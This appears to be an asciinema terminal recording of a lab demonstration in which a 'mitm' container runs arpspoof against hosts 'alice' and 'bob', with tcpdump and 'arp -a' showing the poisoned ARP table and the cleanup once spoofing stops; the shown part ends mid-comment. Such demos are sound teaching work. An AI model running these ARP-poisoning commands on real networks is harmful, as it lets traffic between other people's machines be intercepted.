[45.878867, "o", "\u001b[?25l\u001b[H64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.180 ms\u001b[21X\u001b[2;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[11;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[45.881692, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[45.942371, "o", "\u001b[?25l\u001b[17;73H4 bytes\u001b[K\u001b[18;73H12:43:31.808252 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:33.808675 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:35.809161 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:37.809591 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:39.596943 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[27;73Hq 0, length 64\u001b[K\u001b[28;73H12:43:39.596973 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[29;73Hq 0, length 64\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;22H"]
[45.95121, "o", "#"]
[46.027212, "o", " "]
[46.09463, "o", "\u001b[?25l\u001b[34m\u001b[1m\u001b(0\u001b[1;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m # lets poison the ARP table ...\u001b[K\u001b[2;73H\u001b[K\u001b[34m\u001b[1m\u001b(0\nlqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b(B\u001b[m\u001b[K\u001b[34m\u001b[1m\u001b(0\u001b[4;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m arpspoof -t 10.5.0.2  10.5.0.3\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:4\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:4\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:4\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:4\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:4\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[24G"]
[46.101323, "o", "c"]
[46.148488, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:33.808675 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:35.809161 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:37.809591 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:39.596943 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[25;73Hq 0, length 64\u001b[K\u001b[26;73H12:43:39.596973 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[27;73Hq 0, length 64\u001b[K\u001b[28;73H12:43:39.810295 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;25H"]
[46.174676, "o", "h"]
[46.250173, "o", "e"]
[46.325141, "o", "c"]
[46.399878, "o", "k"]
[46.476599, "o", " "]
[46.551224, "o", "t"]
[46.625788, "o", "h"]
[46.700434, "o", "e"]
[46.776581, "o", " "]
[46.851501, "o", "p"]
[46.924329, "o", "o"]
[47.001159, "o", "i"]
[47.074393, "o", "s"]
[47.147442, "o", "o"]
[47.223667, "o", "n"]
[47.298088, "o", "e"]
[47.373855, "o", "d"]
[47.449209, "o", " "]
[47.52529, "o", "A"]
[47.600135, "o", "R"]
[47.675584, "o", "P"]
[47.750496, "o", " "]
[47.825613, "o", "t"]
[47.902834, "o", "a"]
[47.976542, "o", "b"]
[48.051371, "o", "l"]
[48.094682, "o", "\u001b[?25l\u001b[34m\u001b[1m\u001b(0\u001b[1;73Hlqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b(B\u001b[m\u001b[K\u001b[34m\u001b[1m\u001b(0\u001b[2;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m arpspoof -t 10.5.0.2  10.5.0.3\u001b[K\u001b[3;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[4;73H0:4\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:4\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:4\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:4\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:4\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:4\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[22D"]
[48.123725, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:35.809161 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:37.809591 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:39.596943 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[23;73Hq 0, length 64\u001b[K\u001b[24;73H12:43:39.596973 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[25;73Hq 0, length 64\u001b[K\u001b[26;73H12:43:39.810295 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:41.810964 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;51He"]
[48.126931, "o", "\u001b[?25l\u001b[1;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[10;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[48.129582, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[48.203043, "o", "#"]
[48.280011, "o", "#"]
[48.353363, "o", "#"]
[48.426421, "o", "#"]
[48.500622, "o", "#"]
[48.577252, "o", " "]
[48.654087, "o", "A"]
[48.728671, "o", "R"]
[48.805565, "o", "P"]
[48.880606, "o", " "]
[48.953862, "o", "t"]
[49.028579, "o", "a"]
[49.105023, "o", "b"]
[49.179282, "o", "l"]
[49.254042, "o", "e"]
[49.33055, "o", " "]
[49.406759, "o", "#"]
[49.482105, "o", "#"]
[49.558902, "o", "#"]
[49.634691, "o", "#"]
[49.710889, "o", "#"]
[49.713025, "o", "\u001b[?25l\u001b[1;71H\u001b[1K\u001b[H--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[9;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[49.715245, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[49.786508, "o", "a"]
[49.864374, "o", "r"]
[49.939285, "o", "p"]
[50.014717, "o", " "]
[50.091796, "o", "-"]
[50.093867, "o", "\u001b[?25l\u001b[1;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[2;73H0:4\u001b[K\u001b[3;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[4;73H0:4\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:4\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:4\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:4\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:4\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:4\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[27G"]
[50.099838, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:37.809591 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:39.596943 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[21;73Hq 0, length 64\u001b[K\u001b[22;73H12:43:39.596973 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[23;73Hq 0, length 64\u001b[K\u001b[24;73H12:43:39.810295 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:41.810964 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:43.811709 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;27H"]
[50.166075, "o", "a"]
[50.169057, "o", "\u001b[?25l\u001b[H1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[8;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[14;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[50.169661, "o", "\u001b[?25l\u001b[Hround-trip min/avg/max = 0.180/0.180/0.180 ms\u001b[26X\r\n[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[7;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[13;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[50.170212, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # # lets ping BOB now\u001b[31X\r\n[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[6;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[12;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[50.172567, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[50.242733, "o", "#"]
[50.318419, "o", " "]
[50.394979, "o", "c"]
[50.469882, "o", "h"]
[50.549041, "o", "e"]
[50.624812, "o", "c"]
[50.699272, "o", "k"]
[50.774565, "o", " "]
[50.850588, "o", "B"]
[50.926301, "o", "O"]
[51.002945, "o", "B"]
[51.077519, "o", "'"]
[51.140886, "o", "\u001b[?25l\u001b[17;73Hq 0, length 64\u001b[K\u001b[18;73H12:43:39.596973 IP 10.5.0.2 > 10.5.0.3: ICMP echo request, id 293, se\u001b[19;73Hq 0, length 64\u001b[K\u001b[20;73H12:43:39.810295 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:41.810964 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:43.811709 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:44.786600 ARP, Request who-has 10.5.0.3 tell 10.5.0.4, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;34H"]
[51.149934, "o", "s"]
[51.227871, "o", " "]
[51.302351, "o", "M"]
[51.377898, "o", "A"]
[51.453284, "o", "C"]
[51.529746, "o", " "]
[51.603107, "o", "a"]
[51.678349, "o", "d"]
[51.753436, "o", "d"]
[51.828696, "o", "r"]
[51.901531, "o", "e"]
[51.977506, "o", "s"]
[52.052417, "o", "s"]
[52.094163, "o", "\u001b[?25l\u001b[1;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[2;73H0:4\u001b[K\u001b[3;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[4;73H0:4\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:4\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:4\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:4\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:4\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:4\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[26D"]
[52.127999, "o", " "]
[52.182353, "o", "\u001b[?25l\u001b[17;73Hq 0, length 64\u001b[K\u001b[18;73H12:43:39.810295 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:41.810964 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:43.811709 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:44.786600 ARP, Request who-has 10.5.0.3 tell 10.5.0.4, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;48H"]
[52.202078, "o", "e"]
[52.279132, "o", "n"]
[52.351374, "o", "d"]
[52.429066, "o", "s"]
[52.502476, "o", " "]
[52.578521, "o", "0"]
[52.654973, "o", "0"]
[52.73101, "o", ":"]
[52.805432, "o", "0"]
[52.88102, "o", "4"]
[52.883851, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # # check the tcpdump for stealed packages\u001b[10X\r\n[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[5;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[11;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[52.886592, "o", "\u001b[72C^C\r[10.5.0.2] alice / # \u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[3;73H0:4\u001b[K\u001b[4;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[5;73H0:4\u001b[K\u001b[6;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[7;73H0:4\u001b[K\u001b[8;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[9;73H0:4\u001b[K\u001b[10;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[11;73H0:4\u001b[K\u001b[12;73H^CCleaning up and re-arping targets...\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:3\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[22G\u001b[?2004h"]
[52.90878, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:41.810964 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:43.811709 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:44.786600 ARP, Request who-has 10.5.0.3 tell 10.5.0.4, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:46.604963 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;22H"]
[52.962758, "o", "#"]
[53.037919, "o", " "]
[53.111387, "o", "o"]
[53.187499, "o", "n"]
[53.262398, "o", "c"]
[53.338167, "o", "e"]
[53.413154, "o", " "]
[53.485525, "o", "t"]
[53.563353, "o", "h"]
[53.636895, "o", "e"]
[53.712607, "o", " "]
[53.78806, "o", "p"]
[53.863706, "o", "o"]
[53.887695, "o", "\u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[3;73H0:4\u001b[K\u001b[4;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[5;73H0:4\u001b[K\u001b[6;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[7;73H0:4\u001b[K\u001b[8;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[9;73H0:4\u001b[K\u001b[10;73H^CCleaning up and re-arping targets...\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:3\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:3\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[35G"]
[53.938766, "o", "i"]
[53.94802, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:43.811709 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:44.786600 ARP, Request who-has 10.5.0.3 tell 10.5.0.4, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:46.604963 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:47.605391 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;36H"]
[54.015172, "o", "s"]
[54.09056, "o", "i"]
[54.165334, "o", "o"]
[54.239232, "o", "n"]
[54.316283, "o", "i"]
[54.389954, "o", "n"]
[54.465176, "o", "g"]
[54.540594, "o", " "]
[54.616481, "o", "s"]
[54.689683, "o", "t"]
[54.765797, "o", "o"]
[54.841262, "o", "p"]
[54.889185, "o", "\u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[3;73H0:4\u001b[K\u001b[4;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[5;73H0:4\u001b[K\u001b[6;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[7;73H0:4\u001b[K\u001b[8;73H^CCleaning up and re-arping targets...\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:3\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:3\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:3\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[25D"]
[54.913869, "o", "p"]
[54.990164, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:44.786600 ARP, Request who-has 10.5.0.3 tell 10.5.0.4, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:46.604963 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:47.605391 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:48.605745 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;49He"]
[55.067087, "o", "d"]
[55.144195, "o", ","]
[55.220403, "o", " "]
[55.297059, "o", "A"]
[55.37219, "o", "R"]
[55.44761, "o", "P"]
[55.52266, "o", " "]
[55.599549, "o", "t"]
[55.673929, "o", "a"]
[55.750259, "o", "b"]
[55.826531, "o", "l"]
